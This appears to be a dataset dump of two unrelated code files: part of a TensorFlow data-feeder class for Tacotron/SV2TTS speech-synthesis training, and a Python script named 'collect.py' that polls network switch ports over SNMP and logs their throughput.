        with tf.device("/cpu:0"):
            # Create placeholders for inputs and targets. Don't specify batch size because we want
            # to be able to feed different batch sizes at eval time.
            self._placeholders = [
                tf.placeholder(tf.int32, shape=(None, None), name="inputs"),
                tf.placeholder(tf.int32, shape=(None,), name="input_lengths"),
                tf.placeholder(tf.float32, shape=(None, None, hparams.num_mels),
                               name="mel_targets"),
                tf.placeholder(tf.float32, shape=(None, None), name="token_targets"),
                tf.placeholder(tf.int32, shape=(None,), name="targets_lengths"),
                tf.placeholder(tf.int32, shape=(hparams.tacotron_num_gpus, None),
                               name="split_infos"),
                # SV2TTS
                tf.placeholder(tf.float32, shape=(None, hparams.speaker_embedding_size),
                               name="speaker_embeddings")
            ]

            # Create queue for buffering data
            queue = tf.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32,
                                     tf.int32, tf.int32, tf.float32], name="input_queue")
            self._enqueue_op = queue.enqueue(self._placeholders)
            self.inputs, self.input_lengths, self.mel_targets, self.token_targets, \
                self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()

            # dequeue() loses static shape info; restore it from the placeholders
            self.inputs.set_shape(self._placeholders[0].shape)
            self.input_lengths.set_shape(self._placeholders[1].shape)
            self.mel_targets.set_shape(self._placeholders[2].shape)
            self.token_targets.set_shape(self._placeholders[3].shape)
            self.targets_lengths.set_shape(self._placeholders[4].shape)
            self.split_infos.set_shape(self._placeholders[5].shape)
            self.speaker_embeddings.set_shape(self._placeholders[6].shape)

            # Create eval queue for buffering eval data
            eval_queue = tf.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32,
                                          tf.int32, tf.int32, tf.float32], name="eval_queue")
            self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
            self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
                self.eval_token_targets, self.eval_targets_lengths, \
                self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()

            self.eval_inputs.set_shape(self._placeholders[0].shape)
            self.eval_input_lengths.set_shape(self._placeholders[1].shape)
            self.eval_mel_targets.set_shape(self._placeholders[2].shape)
            self.eval_token_targets.set_shape(self._placeholders[3].shape)
            self.eval_targets_lengths.set_shape(self._placeholders[4].shape)
            self.eval_split_infos.set_shape(self._placeholders[5].shape)
            self.eval_speaker_embeddings.set_shape(self._placeholders[6].shape)

    def start_threads(self, session):
        """Start the daemon producer threads feeding the train and eval queues."""
        self._session = session
        thread = threading.Thread(name="background", target=self._enqueue_next_train_group)
        thread.daemon = True  # Thread will close when parent quits
        thread.start()

        thread = threading.Thread(name="background", target=self._enqueue_next_test_group)
        thread.daemon = True  # Thread will close when parent quits
        thread.start()

    def _get_test_groups(self):
        """Load the next test example: (input, mel_target, token_target, embed_target, mel_length)."""
        meta = self._test_meta[self._test_offset]
        self._test_offset += 1

        text = meta[5]

        input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
        mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
        # Create parallel sequences containing zeros to represent a non finished sequence
        token_target = np.asarray([0.] * (len(mel_target) - 1))
        embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
        return input_data, mel_target, token_target, embed_target, len(mel_target)

    def make_test_batches(self):
        """Build length-bucketed batches covering the whole test set.

        :return: (batches, outputs_per_step)
        """
        start = time.time()

        # Read a group of examples
        n = self._hparams.tacotron_batch_size
        r = self._hparams.outputs_per_step

        # Test on entire test set
        examples = [self._get_test_groups() for i in range(len(self._test_meta))]

        # Bucket examples based on similar output sequence length for efficiency
        examples.sort(key=lambda x: x[-1])
        batches = [examples[i: i + n] for i in range(0, len(examples), n)]
        np.random.shuffle(batches)

        log("\nGenerated %d test batches of size %d in %.3f sec" % (len(batches), n, time.time() - start))
        return batches, r

    def _enqueue_next_train_group(self):
        """Producer loop: keep enqueuing groups of train batches until coordinator stops."""
        while not self._coord.should_stop():
            start = time.time()

            # Read a group of examples
            n = self._hparams.tacotron_batch_size
            r = self._hparams.outputs_per_step
            examples = [self._get_next_example() for i in range(n * _batches_per_group)]

            # Bucket examples based on similar output sequence length for efficiency
            examples.sort(key=lambda x: x[-1])
            batches = [examples[i: i + n] for i in range(0, len(examples), n)]
            np.random.shuffle(batches)

            log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
            for batch in batches:
                feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
                self._session.run(self._enqueue_op, feed_dict=feed_dict)

    def _enqueue_next_test_group(self):
        """Producer loop for the eval queue, cycling over fixed test batches."""
        # Create test batches once and evaluate on them for all test steps
        test_batches, r = self.make_test_batches()
        while not self._coord.should_stop():
            for batch in test_batches:
                feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
                self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)

    def _get_next_example(self):
        """Gets a single example (input, mel_target, token_target, embed_target, mel_length)
        from disk, reshuffling the training metadata after each full pass.
        """
        if self._train_offset >= len(self._train_meta):
            self._train_offset = 0
            np.random.shuffle(self._train_meta)

        meta = self._train_meta[self._train_offset]
        self._train_offset += 1

        text = meta[5]

        input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
        mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
        # Create parallel sequences containing zeros to represent a non finished sequence
        token_target = np.asarray([0.] * (len(mel_target) - 1))
        embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
        return input_data, mel_target, token_target, embed_target, len(mel_target)

    def _prepare_batch(self, batches, outputs_per_step):
        """Pad one batch and split it per GPU; returns the placeholder feed values."""
        assert 0 == len(batches) % self._hparams.tacotron_num_gpus
        size_per_device = int(len(batches) / self._hparams.tacotron_num_gpus)
        np.random.shuffle(batches)

        inputs = None
        mel_targets = None
        token_targets = None
        targets_lengths = None
        split_infos = []

        targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32)  # Used to mask loss
        input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32)

        for i in range(self._hparams.tacotron_num_gpus):
            batch = batches[size_per_device * i:size_per_device * (i + 1)]
            input_cur_device, input_max_len = self._prepare_inputs([x[0] for x in batch])
            inputs = np.concatenate((inputs, input_cur_device), axis=1) if inputs is not None else input_cur_device
            mel_target_cur_device, mel_target_max_len = self._prepare_targets([x[1] for x in batch], outputs_per_step)
            mel_targets = np.concatenate((mel_targets, mel_target_cur_device),
                                         axis=1) if mel_targets is not None else mel_target_cur_device

            # Pad sequences with 1 to infer that the sequence is done
            token_target_cur_device, token_target_max_len = self._prepare_token_targets([x[2] for x in batch],
                                                                                       outputs_per_step)
            token_targets = np.concatenate((token_targets, token_target_cur_device),
                                           axis=1) if token_targets is not None else token_target_cur_device
            split_infos.append([input_max_len, mel_target_max_len, token_target_max_len])

        split_infos = np.asarray(split_infos, dtype=np.int32)

        ### SV2TTS ###

        embed_targets = np.asarray([x[3] for x in batches])

        ##############

        return inputs, input_lengths, mel_targets, token_targets, targets_lengths, \
            split_infos, embed_targets

    def _prepare_inputs(self, inputs):
        """Pad all input sequences to the batch max length; returns (stacked, max_len)."""
        max_len = max([len(x) for x in inputs])
        return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len

    def _prepare_targets(self, targets, alignment):
        """Pad mel targets to max length rounded up to a multiple of `alignment`."""
        max_len = max([len(t) for t in targets])
        data_len = self._round_up(max_len, alignment)
        return np.stack([self._pad_target(t, data_len) for t in targets]), data_len

    def _prepare_token_targets(self, targets, alignment):
        """Pad stop-token targets (one extra frame) to a multiple of `alignment`."""
        max_len = max([len(t) for t in targets]) + 1
        data_len = self._round_up(max_len, alignment)
        return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len

    def _pad_input(self, x, length):
        return np.pad(x, (0, length - x.shape[0]), mode="constant", constant_values=self._pad)

    def _pad_target(self, t, length):
        return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode="constant", constant_values=self._target_pad)

    def _pad_token_target(self, t, length):
        return np.pad(t, (0, length - t.shape[0]), mode="constant", constant_values=self._token_pad)

    def _round_up(self, x, multiple):
        remainder = x % multiple
        return x if remainder == 0 else x + multiple - remainder

    def _round_down(self, x, multiple):
        remainder = x % multiple
        return x if remainder == 0 else x - remainder
|
collect.py | from time import sleep, clock
import simplejson as json
from easysnmp import snmp_get
import threading
import os
import datetime
DELAY = 1  # seconds (currently unused below)
switches = {}  # switch name -> {"ip", "ports", "rdir"}; filled from switch.conf

# Standard IF-MIB OIDs. The 32-bit counters are kept for reference;
# getData() only queries the 64-bit (ifXTable) variants.
ifSpeed32 = "1.3.6.1.2.1.2.2.1.5"
inOctets32 = "1.3.6.1.2.1.2.2.1.10"
outOctets32 = "1.3.6.1.2.1.2.2.1.16"
ifSpeed64 = "1.3.6.1.2.1.31.1.1.1.15"
inOctets64 = "1.3.6.1.2.1.31.1.1.1.6"
outOctets64 = "1.3.6.1.2.1.31.1.1.1.10"
def getData(ip, port):  # returns speed, in, out
    """Query the 64-bit SNMP interface counters for one port.

    :param ip: switch hostname/IP
    :param port: interface index as a string
    :return: dict with integer "speed", "in" and "out" counter values
    """
    oids = {"speed": ifSpeed64, "in": inOctets64, "out": outOctets64}
    return {
        key: int(snmp_get(oid + "." + port, hostname=ip, community='cacti', version=2).value)
        for key, oid in oids.items()
    }
def snmpthread(ip, pt, reverse):  # Switch IP, port, reversed?
    """Poll one switch port forever, appending a throughput sample per interval.

    :param ip: switch hostname/IP
    :param pt: port number
    :param reverse: if True, swap in/out columns (switch-centric ports)
    """
    while 1:
        time = 15  # seconds between the two counter snapshots
        b = getData(ip, str(pt))
        sleep(time)
        e = getData(ip, str(pt))
        speed = b["speed"]
        if speed != 0:
            # counter delta -> bits/s -> Mb/s
            in2 = (e["in"] - b["in"]) / time * 8 / 1024 / 1024  # Mb/s
            out2 = (e["out"] - b["out"]) / time * 8 / 1024 / 1024  # Mb/s
        else:
            in2 = 0
            out2 = 0
        now = datetime.datetime.now()
        try:
            # Fix: the file handle was opened every iteration and never closed
            # (descriptor leak); a context manager closes it deterministically.
            path = "/opt/stat/data/high/{}-{}-{}:{}-{}".format(now.month, now.day, now.year, ip, pt)
            with open(path, "a+") as datafile:
                if reverse:
                    datafile.write("{0:02}:{1:02}:{2:02},{3:.4f},{4:.4f},{5:.4f}\n".format(now.hour, now.minute, now.second, round(out2, 6), round(in2, 6), speed))
                else:
                    datafile.write("{0:02}:{1:02}:{2:02},{3:.4f},{4:.4f},{5:.4f}\n".format(now.hour, now.minute, now.second, round(in2, 6), round(out2, 6), speed))
        except Exception as exc:
            # Fix: the exception used to be bound to `e`, shadowing the `e` counter snapshot.
            print("Error creating log files, {}".format(exc))
#####
# main program code
try:
    if not os.path.exists(os.path.dirname("/opt/stat/data/")):  # trailing slash is IMPORTANT
        os.makedirs(os.path.dirname("/opt/stat/data/"))
except Exception as e:
    # NOTE(review): exits with status 0 on failure, as before — consider a nonzero code.
    print("Error creating data logging directory for network statistics")
    exit(0)
try:
    if not os.path.exists(os.path.dirname("/opt/stat/data/high/")):
        os.makedirs(os.path.dirname("/opt/stat/data/high/"))
except Exception:
    # Fix: was a bare `except:` (would also swallow KeyboardInterrupt/SystemExit)
    print("Error creating high-resolution data logging directory for network statistics")
    exit(0)
try:
    # Fix: the config file handle was never closed; `with` closes it.
    with open("switch.conf", 'r') as conf_file:
        # Fix: the manual counter was incremented before parsing, so errors were
        # reported one line too late; enumerate() reports the true line number.
        for i, line in enumerate(conf_file, 1):
            try:
                # Fix: strip the trailing newline — it was kept in the last field
                # ("rdir"), so reversed port numbers like "1\n" never matched.
                sub = line.strip().split(":")
                data = {}
                name = sub[0]  # name of switch
                data["ip"] = sub[1]  # IP in IPv4 format
                data["ports"] = int(sub[2])  # Number of ports on switch
                data["rdir"] = sub[3]  # switch-centric ports, separated by commas
                switches[name] = data
                # Example:
                # swm1:1.2.3.4:24:1
            except Exception:
                print("Error on line {} in switch file".format(i))
except Exception:
    print("Error, you need a switch configuration file")
    exit(0)
for switch in switches:
    reversed_ports = switches[switch]["rdir"].split(",")
    for port in range(1, switches[switch]["ports"] + 1):
        # Fix: the two branches only differed in the boolean; collapsed.
        reverse = str(port) in reversed_ports
        collect = threading.Thread(target=snmpthread, args=(switches[switch]["ip"], port, reverse))
        collect.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.